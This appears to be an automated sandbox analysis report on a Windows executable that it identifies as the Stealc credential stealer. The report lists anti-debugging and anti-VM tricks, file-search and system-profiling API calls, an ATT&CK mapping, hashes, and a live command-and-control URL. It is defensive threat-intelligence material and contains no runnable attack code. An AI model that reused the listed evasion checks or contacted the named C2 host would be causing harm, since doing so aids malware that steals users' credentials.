                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445F83 second address: 1445F97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1455A9F second address: 1455AA4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1456335 second address: 1456339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1456339 second address: 1456352 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF035h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145646A second address: 1456470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1456470 second address: 145649A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007EFD80CCF033h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jnl 00007EFD80CCF026h 0x00000016 popad 0x00000017 pop edi 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145649A second address: 14564BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CDE8D6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jnc 00007EFD80CDE8C6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14564BF second address: 14564DF instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFD80CCF026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007EFD80CCF031h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14567C1 second address: 14567C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14568FC second address: 1456900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14597AD second address: 14597C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007EFD80CDE8D3h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14597C7 second address: 14597DD instructions: 0x00000000 rdtsc 0x00000002 js 00007EFD80CCF026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jbe 00007EFD80CCF026h 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14597DD second address: 14597E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1459874 second address: 14598D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D2542h], esi 0x00000013 push 00000004h 0x00000015 jmp 00007EFD80CCF033h 0x0000001a call 00007EFD80CCF029h 0x0000001f push edx 0x00000020 push esi 0x00000021 jmp 00007EFD80CCF02Ah 0x00000026 pop esi 0x00000027 pop edx 0x00000028 push eax 0x00000029 jnl 00007EFD80CCF032h 0x0000002f jno 00007EFD80CCF02Ch 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push edi 0x0000003d pop edi 0x0000003e jo 00007EFD80CCF026h 0x00000044 popad 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1459B3A second address: 1459B44 instructions: 0x00000000 rdtsc 0x00000002 jng 00007EFD80CDE8CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145AD6F second address: 145AD87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF033h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145AD87 second address: 145AD8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145C552 second address: 145C565 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFD80CCF026h 0x00000008 ja 00007EFD80CCF026h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55102DF second address: 55102F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55102F8 second address: 5510320 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ecx, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007EFD80CCF034h 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5510320 second address: 551033D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551033D second address: 5510399 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007EFD80CCF037h 0x00000009 add al, FFFFFFBEh 0x0000000c jmp 00007EFD80CCF039h 0x00000011 popfd 0x00000012 mov cx, 0B07h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007EFD80CCF039h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5510399 second address: 55103BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFD80CDE8CDh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55103BE second address: 55103C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55103C4 second address: 55103C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55103C8 second address: 55103CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11C1D3E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11C1E17 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 136D5CA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11BF005 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13FE7D1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00F738B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F74910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F74910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00F6DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00F6E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F74570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00F74570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00F6ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F616D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F6F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F73EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00F73EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00F6BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F6DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F61160 GetSystemInfo,ExitProcess,0_2_00F61160
                Source: file.exe, file.exe, 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1466069910.0000000001754000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: file.exe, 00000000.00000002.1466069910.0000000001754000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1466069910.0000000001723000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1466069910.00000000016DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13249
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13252
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13303
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13263
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13271
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F645C0 VirtualProtect ?,00000004,00000100,000000000_2_00F645C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F79860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F79860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F79750 mov eax, dword ptr fs:[00000030h]0_2_00F79750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F778E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00F778E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7460, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F79600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00F79600
                Source: file.exe, file.exe, 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]~Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00F77B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F77980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00F77980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F77850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00F77850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F77A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00F77A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.f60000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1466069910.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1424901603.0000000005380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7460, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.f60000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1466069910.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1424901603.0000000005380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7460, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.206/e2b1563c6670f193.php/7%VirustotalBrowse
                http://185.215.113.206/15%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/trueunknown
                http://185.215.113.206/e2b1563c6670f193.phptrue
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/e2b1563c6670f193.php/file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://185.215.113.206file.exe, 00000000.00000002.1466069910.00000000016DE000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.206/wsfile.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/e2b1563c6670f193.phpXfile.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/e2b1563c6670f193.php2file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206/e2b1563c6670f193.phpDfile.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.206/w9file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.206gw0file.exe, 00000000.00000002.1466069910.00000000016DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.215.113.206
                                		unknownPortugal
                                		206894WHOLESALECONNECTIONSNLtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1542734
                                Start date and time:2024-10-26 08:51:27 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 2s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:6
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 19
                                • Number of non-executed functions: 79
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.215.113.206file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                • 185.215.113.206/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/e2b1563c6670f193.php
                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                • 185.215.113.206/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/e2b1563c6670f193.php
                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                • 185.215.113.206/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/e2b1563c6670f193.php
                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                • 185.215.113.206/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/e2b1563c6670f193.php
                                file.exeGet hashmaliciousLummaC, StealcBrowse
                                • 185.215.113.206/e2b1563c6670f193.php

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206
                                T52Z708x2p.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                • 185.215.113.84
                                lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                • 185.215.113.84
                                Us051y7j25.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                • 185.215.113.84
                                thcdVit1dX.exeGet hashmaliciousPhorpiexBrowse
                                • 185.215.113.66
                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.947326293618379
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'872'384 bytes
                                MD5:79ad5f851a1231db208f005432d0cf1c
                                SHA1:67776523d7821292da1ced82653558a60b8a7f19
                                SHA256:ab409dfe5cafaa8a881a844cd26eed91995b9546528e494db3b46f26812824eb
                                SHA512:2b1a2375cea5e30cb4da43a1f539ff920cdb6bd1a758b2ee8c8d7fcd75d540b6eb81330b3313e1ebf43da22110d818e3d6e5df869c6751dadf1901dd57722cbd
                                SSDEEP:49152:FGr4CilaGYbJQlw/NGMDweoVnrfcXCNuX7Ik:FGr4CsaGamiweGG0
                                TLSH:578533D56EF3D0A8D0CBA33568312322B0D2494199FDE0F5EEEE13629967E196382533
